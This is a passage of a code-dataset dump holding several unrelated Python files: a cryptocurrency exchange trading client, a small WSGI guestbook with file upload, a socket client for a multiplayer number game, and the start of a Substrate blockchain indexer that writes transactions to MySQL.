str(internal_order_id),\n 'side': side,\n 'quantity': quantity,\n 'price': price,\n 'cum_quantity_filled': 0,\n 'received_ms': int(round(time.time() * 1000))\n })\n return\n except QuoineAPIException as e:\n logger().error('Failed to create order due to error: {}'.format(e))\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CREATE_FAILED',\n 'reason': 'Unknown exception type',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'internal_order_id': str(internal_order_id),\n 'side': side,\n 'quantity': quantity,\n 'price': price,\n 'cum_quantity_filled': 0,\n 'received_ms': int(round(time.time() * 1000))\n })\n return\n\n self.internal_to_external_id[str(internal_order_id)] = str(response['id'])\n self.external_to_internal_id[str(response['id'])] = str(internal_order_id)\n\n internal_response = {\n 'action': 'CREATED',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'exchange_order_id': str(response['id']),\n 'internal_order_id': str(internal_order_id),\n 'side': side,\n 'quantity': Decimal(str(quantity)),\n 'price': Decimal(str(price)),\n 'cum_quantity_filled': Decimal('0'),\n 'order_status': 'OPEN',\n 'server_ms': response['created_at'] * 1000,\n 'received_ms': int(round(time.time() * 1000))\n }\n self.open_orders_by_exchange_id[str(response['id'])] = internal_response\n self.notify_callbacks('trade_lifecycle', data=internal_response)\n\n def get_open_orders_by_side_and_price(self):\n open_orders_by_side_and_price = {'bids': {}, 'asks': {}}\n\n for order in self.open_orders_by_exchange_id.values():\n if order['side'] == 'buy':\n if Decimal(order['price']) in open_orders_by_side_and_price['bids']:\n open_orders_by_side_and_price['bids'][Decimal(order['price'])] \\\n = open_orders_by_side_and_price['bids'][order['price']] + \\\n order['quantity'] - order['cum_quantity_filled']\n else:\n open_orders_by_side_and_price['bids'][Decimal(order['price'])] = order['quantity'] - \\\n order['cum_quantity_filled']\n elif order['side'] == 'sell':\n if Decimal(order['price']) in open_orders_by_side_and_price['asks']:\n open_orders_by_side_and_price['asks'][Decimal(order['price'])] \\\n = open_orders_by_side_and_price['asks'][order['price']] + \\\n order['quantity'] - order['cum_quantity_filled']\n else:\n open_orders_by_side_and_price['asks'][Decimal(order['price'])] = order['quantity'] - \\\n order['cum_quantity_filled']\n\n return open_orders_by_side_and_price\n\n def get_product_id(self, base, quote):\n symbol = str.upper(base) + str.upper(quote)\n if symbol in self.symbol_to_product:\n return self.symbol_to_product[symbol]\n else:\n return None\n\n def cancel_all(self, base, quote):\n product_id = self.get_product_id(base, quote)\n live_orders = self.client.get_orders(product_id=product_id, status='live')\n partially_filled_orders = self.client.get_orders(product_id=product_id, status='partially_filled')\n orders = live_orders['models'] + partially_filled_orders['models']\n\n for order in orders:\n try:\n self.client.cancel_order(order['id'])\n except Exception as e:\n logger().error('Failed to cancel order with error: {}'.format(str(e)))\n\n time.sleep(2)\n\n # Qryptos exchange fees are always paid in the quote currency\n # TODO - Use self.client.get_my_executions (with limit 1000) instead. Should be far faster\n def get_fees_paid(self, base, quote, start_s, end_s):\n if start_s > end_s:\n logger().error('Start time cannot be after end time')\n return Decimal(0)\n\n product_id = self.get_product_id(base, quote)\n response = self.client.get_orders(product_id=product_id, limit=100)\n # Find start page via binary search\n\n total_pages = self.find_actual_total_pages(product_id, response['total_pages'], response['total_pages'] + 1, 0)\n\n first_page = self.find_first_or_last_page_of_orders(product_id, int(total_pages / 2), start_s, end_s, 'first',\n total_pages)\n if first_page == -1:\n logger().warn('Unable to find any orders on or after epoch time: {}'.format(start_s))\n return Decimal('0')\n\n last_page = self.find_first_or_last_page_of_orders(product_id, int(total_pages / 2), start_s, end_s, 'last',\n total_pages)\n if last_page == -1:\n logger().warn('Unable to find any orders on or before epoch time: {}'.format(end_s))\n return Decimal('0')\n\n # Request all pages in range [start, end]\n orders_in_range_with_fills = []\n for page in range(first_page, last_page + 1):\n response = self.client.get_orders(product_id=product_id, page=page, limit=100)\n orders = response['models']\n for order in orders:\n if start_s <= order['created_at'] <= end_s and order['filled_quantity'] != '0.0':\n orders_in_range_with_fills.append(order)\n\n fees_in_quote_currency = Decimal('0')\n for order in orders_in_range_with_fills:\n fees_in_quote_currency += order['order_fee']\n\n return fees_in_quote_currency\n\n def find_actual_total_pages(self, product_id, page_to_check, last_blank_page_seen, highest_non_blank_page_seen):\n response = self.client.get_orders(product_id=product_id, page=page_to_check, limit=100)\n orders = response['models']\n\n if len(orders) > 0:\n if last_blank_page_seen - page_to_check == 1:\n return page_to_check\n else:\n highest_non_blank_page_seen = page_to_check\n next_page_to_check = int((page_to_check + last_blank_page_seen) / 2)\n return self.find_actual_total_pages(product_id, next_page_to_check,\n last_blank_page_seen, highest_non_blank_page_seen)\n else:\n last_blank_page_seen = page_to_check\n next_page_to_check = int((highest_non_blank_page_seen + last_blank_page_seen) / 2)\n return self.find_actual_total_pages(product_id, next_page_to_check, last_blank_page_seen,\n highest_non_blank_page_seen)\n\n def find_first_or_last_page_of_orders(self, product_id, current_page, start_s, end_s, first_or_last, total_pages):\n if first_or_last == 'first':\n first_page = -1\n while True:\n response = self.client.get_orders(product_id=product_id, page=current_page, limit=100)\n orders = response['models']\n matched = False\n for order in orders:\n # Have to use created_at instead of updated_at as appears to be sorted by created_at\n created_at_s = order['created_at']\n if created_at_s <= end_s:\n matched = True\n break\n\n if matched:\n first_page = current_page\n next_page = int(current_page / 2)\n else:\n if first_page - current_page == 1 or first_page == current_page:\n return first_page\n elif current_page == 0:\n return -1\n else:\n next_page = int((current_page + first_page) / 2)\n\n if next_page == current_page:\n return first_page\n else:\n current_page = next_page\n else:\n last_page = -1\n\n while True:\n response = self.client.get_orders(product_id=product_id, page=current_page, limit=100)\n orders = response['models']\n matched = False\n for order in orders:\n created_at_s = order['created_at']\n if created_at_s >= start_s:\n matched = True\n break\n\n if matched:\n last_page = current_page\n next_page = int((current_page + total_pages) / 2)\n else:\n if current_page == last_page + 1 or current_page == last_page:\n return last_page\n elif current_page == total_pages - 1:\n return -1 # If we're on the last page and still don't have a match, it doesn't exist\n else:\n next_page = int((current_page + last_page) / 2)\n\n if next_page == current_page:\n return last_page\n else:\n current_page = next_page\n\n def get_deposit_address(self, currency):\n raise NotImplementedError('Qryptos does not have a deposit function in their API')\n\n\nif __name__ == '__main__':\n def callback(data_type, data, **unused):\n print(data_type)\n print(data)\n\n\n creds = get_creds()\n q = QryptosService('qryptos', public_key=creds['qryptos_pub_prod'], private_key=creds['qryptos_priv_prod'])\n\n import csv\n\n trades = q.client.get_executions(q.get_product_id('UBT', 'ETH'), 1000, 1)\n trades = trades['models']\n trades_to_delete = []\n i = 0\n for trade in trades:\n # 1535673600 31 Aug midnight gmt\n # 1536278400 7 September midnight gmt\n if trade['created_at'] > 1536278400 or trade['created_at'] < 1535673600:\n trades_to_delete.append(i)\n i += 1\n\n for index in reversed(trades_to_delete):\n trades.pop(index)\n\n keys = trades[0].keys()\n\n with open('qryptos_executions_ours.csv', 'w') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(trades)\n\n\n\n # order = q.client.get_order('85966628')\n # q.get_fees_paid('UBT', 'ETH', 0, 99999999999)\n # q.get_balances()\n # q.follow_market('ETH', 'BTC')\n # q.cancel_all('ETH', 'BTC')\n # price then qty\n # balances = q.get_balances()\n # print(balances)\n # q.create_order('ETH', 'BTC', '0.0452', '0.1', 'sell', 'limit', 'an_id', request_id='rid_1')\n # q.cancel_order('ETH', 'BTC', 'internal_id', 'request_id', exchange_order_id='81422113')\n","sub_path":"exchanges/qryptos/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":23468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"81633363","text":"import wsgiref.validate\nfrom tempfile import TemporaryFile\nimport cgi\nimport os\n\nfrom utils import parse_http_x_www_form_urlencoded_post_data, \\\n get_first_element, parse_http_get_data, parse_http_headers, \\\n parse_http_content_type, parse_http_uri\n\nDEBUG = True\nSTATIC_URL = '/static/'\nSTATIC_ROOT = 'data'\n\ndata_messages = [\n b'Name: user
    Message: hi!',\n b'Name: user
    Message: hi!',\n]\n#import wsgiref.util\n#wsgiref.util.FileWrapper().filelike()\n\ndef read(environ):\n length = int(environ.get('CONTENT_LENGTH', 0))\n stream = environ['wsgi.input']\n body = TemporaryFile(mode='w+b')\n while length > 0:\n part = stream.read(min(length, 1024*200)) # 200KB buffer size\n if not part: break\n body.write(part)\n length -= len(part)\n body.seek(0)\n environ['wsgi.input'] = body\n return body\n\n@wsgiref.validate.validator\ndef application(environ, start_response):\n # https://www.python.org/dev/peps/pep-3333/#environ-variables\n REQUEST_METHOD = environ['REQUEST_METHOD']\n CONTENT_TYPE, CONTENT_TYPE_KWARGS = parse_http_content_type(environ)\n SERVER_PROTOCOL = environ['SERVER_PROTOCOL']\n HEADERS = parse_http_headers(environ)\n URI_PATH = environ['PATH_INFO']\n URI_QUERY = environ['QUERY_STRING']\n URI = parse_http_uri(environ)\n POST = parse_http_x_www_form_urlencoded_post_data(environ)\n GET = parse_http_get_data(environ)\n\n status = '200 OK'\n headers = [('Content-type', 'text/html; charset=utf-8')]\n\n if URI_PATH == '/favicon.ico':\n status = '404 Not Found'\n start_response(status, headers)\n return [b'']\n print(environ)\n if DEBUG:\n print(\"{REQUEST_METHOD} {URI_PATH}?{URI_QUERY} {SERVER_PROTOCOL}\\n\"\n \"CONTENT_TYPE: {CONTENT_TYPE}; {CONTENT_TYPE_KWARGS}\\n\"\n \"POST: {POST}\\n\"\n \"GET: {GET}\\n\"\n \":HEADERS:\\n{HEADERS}\\n\"\n .format(**locals()))\n\n if URI_PATH == \"/upload\":\n status = '303 See Other'\n headers.append(('Location', '/'))\n body = read(environ)\n form = cgi.FieldStorage(fp=body, environ=environ, keep_blank_values=True)\n try:\n fileitem = form['file']\n except KeyError:\n fileitem = None\n if fileitem is not None and fileitem.file is not None:\n fn = os.path.basename(fileitem.filename)\n with open(\"data/\" + fn, 'wb') as f:\n data = fileitem.file.read(1024)\n while data:\n f.write(data)\n data = fileitem.file.read(1024)\n\n start_response(status, headers)\n return [b'']\n\n if URI_PATH.startswith(STATIC_URL):\n path = URI_PATH.split(STATIC_URL)[-1]\n if \"../\" in path:\n status = '404 Not Found'\n start_response(status, headers)\n return [b'']\n\n with open(STATIC_ROOT + \"/\" + path, 'rb') as f:\n start_response(status, [('Content-type', 'application/octet-stream; charset=utf-8')])\n return [f.read()]\n\n\n\n with open('main.html', 'rb') as f:\n template_bytes = f.read()\n\n if REQUEST_METHOD == 'POST':\n status = '303 See Other'\n headers.append(('Location', '/'))\n name = get_first_element(POST, 'name', '')\n message = get_first_element(POST, 'message', '')\n data_message_text = \"Name: {0}
    Message: {1}\".format(name, message)\n data_message_bytes = data_message_text.encode('utf-8')\n data_messages.append(data_message_bytes)\n start_response(status, headers)\n return [b'']\n\n messages = b'
    '.join(data_messages)\n template_bytes = template_bytes.replace(b'{{messages}}', messages)\n\n start_response(status, headers)\n return [template_bytes]\n","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"433044469","text":"# -*- coding: utf-8 -*-\nimport json\nimport socket\nimport threading\nimport messages\nimport model\nimport view\n\nBUFFER_SIZE = 2 ** 10\n\n\nclass Application(object):\n instance = None\n\n def __init__(self, args):\n self.args = args\n self.closing = False\n self.host = None\n self.port = None\n self.receive_worker = None\n self.sock = None\n self.username = None\n self.ui = view.UI(self)\n Application.instance = self\n\n def execute(self):\n \"\"\"\n Метод, вызываемый в самом начале запуска клиента\n \"\"\"\n if not self.ui.show():\n return # если не отрисовалось что-то, то он сюда зайдет\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.sock.connect((self.host, self.port))\n except (socket.error, OverflowError):\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n return\n self.first_hello_message()\n self.receive_worker = threading.Thread(target=self.receive)\n self.receive_worker.start()\n self.ui.loop()\n\n def first_hello_message(self):\n \"\"\"\n Клиент пишет серверу пустое сообщение, только лишь с именем данного клиента,\n Чтобы сервер оповеслил всех остальных о новом игроке.\n Сервер делает рассылку с новым score, с учетом нового игрока\n \"\"\"\n message = model.Message(username_last_player=self.username)\n try:\n self.sock.sendall(message.marshal()) # шлем сообщение через сокет серверу\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n\n def receive(self):\n \"\"\"\n Метод, в котором с помощью receive_all мы получаем объект класса message, внутри которого лежат нужные\n нам данные. В конце метода вызывается метод show_message(message), определенный внутри класса UI\n \"\"\"\n while True:\n try:\n message = model.Message(**json.loads(self.receive_all()))\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n return\n self.ui.show_message(message)\n\n def receive_all(self):\n \"\"\"\n Метод, который пытается считывать из сокета кусочки размером с BUFFER_SIZE,\n пока не получит символ, означающий конец передачи\n \"\"\"\n buffer = \"\"\n while not buffer.endswith(model.END_CHARACTER):\n buffer += self.sock.recv(BUFFER_SIZE).decode(model.TARGET_ENCODING)\n return buffer[:-1]\n\n def add_number(self):\n \"\"\"\n Метод, который вызывается при нажатии кнопки add у клиента\n \"\"\"\n message = model.Message(username_last_player=self.username, quit=False)\n\n self.ui.add_number_button['state'] = 'disabled'\n self.ui.end_game_button['state'] = 'disabled'\n try:\n self.sock.sendall(message.marshal())\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n\n def end_game_for_this_client(self):\n \"\"\"\n Метод, который вызывается при нажатии кнопки end у клиента\n \"\"\"\n message = model.Message(username_last_player=self.username, quit=True)\n self.ui.add_number_button['state'] = 'disabled'\n self.ui.end_game_button['state'] = 'disabled'\n try:\n self.sock.sendall(message.marshal())\n except (ConnectionAbortedError, ConnectionResetError):\n if not self.closing:\n self.ui.alert(messages.ERROR, messages.CONNECTION_ERROR)\n\n def exit(self):\n \"\"\"\n Метод, который вызывался изначально, чтобы отключить текущего клиента от чата\n \"\"\"\n self.closing = True\n try:\n self.sock.sendall(model.Message(username=self.username, message=\"\", quit=True).marshal())\n except (ConnectionResetError, ConnectionAbortedError, OSError):\n print(messages.CONNECTION_ERROR)\n finally:\n self.sock.close()\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"113052263","text":"# The App listening to new blocks written read the exstrincs and store the transactions in a mysql/mariadb database.\n# the database must be created, the app will create the tables and indexes used.\n# import libraries\n# system packages\nimport sys\nimport os\nimport json\n# Substrate module\nfrom substrateinterface import SubstrateInterface, Keypair,ExtrinsicReceipt\nfrom substrateinterface.exceptions import SubstrateRequestException\n# base64 encoder/decoder\nimport base64\n# base58 encoder/decoder\nimport base58\n#import scale library to load data types\nimport scalecodec\n# import mysql connector\nimport mysql.connector\ncurrentime=\"\"\n\n# read environment variables\ntry:\n DB_NAME=os.environ['DB_NAME']\n DB_USER=os.environ['DB_USER']\n DB_PWD=os.environ['DB_PWD']\n DB_HOST=os.environ['DB_HOST']\n NODE=os.environ['NODE']\n\nexcept NameError:\n print(\"System Variables have not been set\")\n exit(1)\n\n\n# function to load data types registry\ndef load_type_registry_file(file_path: str) -> dict:\n with open(os.path.abspath(file_path), 'r') as fp:\n data = fp.read()\n return json.loads(data)\n# function to create tables required\ndef create_tables():\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n cursor = cnx.cursor()\n \n # use database\n try:\n cursor.execute(\"USE {}\".format(DB_NAME))\n except mysql.connector.Error as err:\n print(\"Database {} does not exists.\".format(DB_NAME))\n print(err)\n exit(1)\n # create tables\n createtx=\"CREATE TABLE `transactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,`txhash` VARCHAR(66) NOT NULL, \\\n `sender` VARCHAR(64) NOT NULL, `recipient` VARCHAR(64) NOT NULL, \\\n `amount` numeric(32,0) NOT NULL, \\\n `gasfees` numeric(32,0) NOT NULL, \\\n `dtblockchain` DATETIME NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table TRANSACTIONS...\")\n cursor.execute(createtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'transactions' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # create indexes\n createidxtx=\"CREATE INDEX txhash on transactions(txhash)\"\n try:\n print(\"Creating index TXHASH on TRANSACTIONS...\")\n cursor.execute(createidxtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Duplicate key name 'txhash'\"):\n print(err.msg)\n else:\n print(\"OK\")\n createidxtx=\"CREATE INDEX sender on transactions(sender)\"\n try:\n print(\"Creating index SENDER on TRANSACTIONS...\")\n cursor.execute(createidxtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Duplicate key name 'sender'\"):\n print(err.msg)\n else:\n print(\"OK\")\n createidxtx=\"CREATE INDEX recipient on transactions(recipient)\"\n try:\n print(\"Creating index RECIPIENT on TRANSACTIONS...\")\n cursor.execute(createidxtx)\n except mysql.connector.Error as err:\n if(err.msg!=\"Duplicate key name 'recipient'\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating sync table to keep syncronisation info\n createsync=\"CREATE TABLE `sync` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `lastblocknumberverified` INT(11) NOT NULL, \\\n `lastapprovalrequestprocessed` int(11) default 0 not null,\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table SYNC...\")\n cursor.execute(createsync)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'sync' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating categories table for impact actions\n createcategories=\"CREATE TABLE `impactactionscategories` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(64) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionscategories...\")\n cursor.execute(createcategories)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionscategories' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactions table for impact actions\n createactions=\"CREATE TABLE `impactactions` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(128) NOT NULL,\\\n `category` INT(11) NOT NULL,`auditors` INT(11) NOT NULL,`blockstart` INT(11) NOT NULL,\\\n `blockend` INT(11) NOT NULL, `rewardstoken` INT(11) NOT NULL, `rewardsamount` INT(32) NOT NULL,\\\n `rewardsoracle` INT(32) NOT NULL,`rewardauditors` INT(32) NOT NULL,\\\n `slashingsauditors` INT(32) NOT NULL,`maxerrorsauditor` INT(11) NOT NULL,\\\n `fields` varchar(8192) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), \\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactions...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactions' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsoracles table for impact actions\n createactions=\"CREATE TABLE `impactactionsoracles` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(128) NOT NULL,\\\n `account` VARCHAR(48) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsoracles...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsoracles' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsauditors table for impact actions\n createactions=\"CREATE TABLE `impactactionsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `description` VARCHAR(128) NOT NULL,\\\n `account` VARCHAR(48) NOT NULL,`categories` VARCHAR(128) NOT NULL,\\\n `area` VARCHAR(64) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsauditors...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsauditors' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsproxy table for impact actions\n createactions=\"CREATE TABLE `impactactionsproxy` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `account` VARCHAR(48) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsproxy...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsproxy' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsapprovalrequests table for impact actions\n createactions=\"CREATE TABLE `impactactionsapprovalrequests` (`id` MEDIUMINT NOT NULL,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `info` VARCHAR(8192) NOT NULL,\\\n `dtapproved` DATETIME,\\\n `dtrefused` DATETIME,\\\n CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsapprovalrequests...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsapprovalrequests' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsapprovalrequestsauditors table for impact actions\n createactions=\"CREATE TABLE `impactactionsapprovalrequestsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `approvalrequestid` int(11) NOT NULL,\\\n `auditor` VARCHAR(48) NOT NULL,\\\n `maxdays` INT(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsapprovalrequestsauditors...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsapprovalrequestsauditors' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating impactactionsapprovalrequestvotes table for impact actions\n createactions=\"CREATE TABLE `impactactionsapprovalrequestauditorvotes` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `approvalrequestid` int(11) NOT NULL,\\\n `vote` VARCHAR(1) NOT NULL,\\\n `otherinfo` VARCHAR(66) NOT NULL,\\\n `dtrewards` DATETIME NOT NULL,\\\n CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))\"\n try:\n print(\"Creating table impactactionsapprovalrequestauditorvotes...\")\n\n cursor.execute(createactions)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'impactactionsapprovalrequestauditorvotes' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating assets table for FT\n createassets=\"CREATE TABLE `ftassets` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `assetid` int(11) NOT NULL,\\\n `owner` VARCHAR(48) NOT NULL,\\\n `maxzombies` int(11) NOT NULL,\\\n `minbalance` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table ftassets...\")\n cursor.execute(createassets)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'ftassets' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n # creating transaction for fungible tokens\n createassets=\"CREATE TABLE `fttransactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\\\n `blocknumber` INT(11) NOT NULL,\\\n `txhash` VARCHAR(66) NOT NULL,\\\n `dtblockchain` DATETIME NOT NULL,\\\n `signer` VARCHAR(48) NOT NULL,\\\n `sender` VARCHAR(48) NOT NULL,\\\n `category` VARCHAR(20) NOT NULL,\\\n `assetid` int(11) NOT NULL,\\\n `recipient` VARCHAR(48) NOT NULL,\\\n `amount` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\\\n PRIMARY KEY (id))\"\n try:\n print(\"Creating table fttransactions...\")\n cursor.execute(createassets)\n except mysql.connector.Error as err:\n if(err.msg!=\"Table 'fttransactions' already exists\"):\n print(err.msg)\n else:\n print(\"OK\")\n\n #closing database\n cursor.close()\n cnx.close()\n# function to syncronise the blockchain reading the old blocks if not yet loaded\ndef sync_blockchain(substrate):\n # we get the the last block from the blockchain\n r=substrate.rpc_request(method='chain_getHeader',params=[],result_handler=None)\n rs=r.get('result')\n lastblockhex=rs.get('number')\n lastblocknumber=int(lastblockhex,16)\n print(\"[Info] Last Block: \",lastblocknumber)\n # we check the last block reconcilied\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n cursor = cnx.cursor(dictionary=True)\n lastblocknumberverified=0\n query=\"select * from sync limit 1\"\n try:\n cursor.execute(query)\n for row in cursor:\n lastblocknumberverified=row['lastblocknumberverified']\n #lastblocknumberverified=row.get('lastblocknumberverified')\n except mysql.connector.Error as err:\n print(err.msg)\n lastblocknumberverified=0\n \n print(\"[INFO] Last block number verified:\",lastblocknumberverified)\n # loop the new block number to find gaps and fill them in case\n x=lastblocknumberverified+1\n cursor.close()\n cursorb = cnx.cursor()\n print(\"[INFO] Syncing previous blocks...\")\n while x<=lastblocknumber:\n # get block data\n print(\"Syncing block # \",x)\n # process the block of data\n process_block(x)\n # update sync\n sqlst=\"\"\n if(lastblocknumberverified==0):\n sqlst=\"insert into sync set lastblocknumberverified=\"+str(x)\n else:\n sqlst=\"update sync set lastblocknumberverified=\"+str(x)\n try:\n cursorb.execute(sqlst)\n cnx.commit()\n except mysql.connector.Error as err:\n print(err.msg)\n \n lastblocknumberverified=x\n # increase block number\n x=x+1\n #end while loop\n cursorb.close()\n cnx.close()\n\n\n\n# function to store a new transaction\ndef store_transaction(blocknumber,txhash,sender,recipient,amount,currenttime,gasfees):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n print(\"Storing New Transaction\")\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currentime)\n print(\"Sender: \",sender)\n print(\"Recipient: \",recipient)\n print(\"Amount: \",amount)\n print(\"`Gas fees`: \",gasfees)\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into transactions set blocknumber=%s,txhash=%s,sender=%s,recipient=%s,amount=%s,gasfees=%s,dtblockchain=%s\"\n datatx=(blocknumber,txhash,sender,recipient,amount,gasfees,dtblockchain)\n try:\n cursor.execute(addtx,datatx)\n except mysql.connector.Error as err:\n print(err.msg)\n cnx.commit()\n cursor.close()\n cnx.close()\n# function to store Impact Actions - New Impact Action\ndef impactactions_newimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction,data):\n cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)\n #decode json structure\n j=json.loads(data)\n print(\"Storing New Impact Action\")\n print(\"BlockNumber: \",blocknumber)\n print(\"TxHash: \",txhash)\n print(\"Current time: \",currenttime)\n print(\"Signer: \",signer)\n print(\"Id: \",idimpactaction)\n print(\"Data: \",data)\n print(\"Category: \",j['category'])\n cursor = cnx.cursor()\n dtblockchain=currenttime.replace(\"T\",\" \")\n dtblockchain=dtblockchain[0:19]\n addtx=\"insert into impactactions set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s\"\n addtx=addtx+\",description=%s,category=%s,auditors=%s,blockstart=%s,blockend=%s,rewardstoken=%s,rewardsamount=%s,rewardsoracle=%s\"\n addtx=addtx+\",rewardauditors=%s,slashingsauditors=%s,maxerrorsauditor=%s,fields=%s\"\n if 'fields' in j:\n f=j['fields']\n else: \n f={}\n 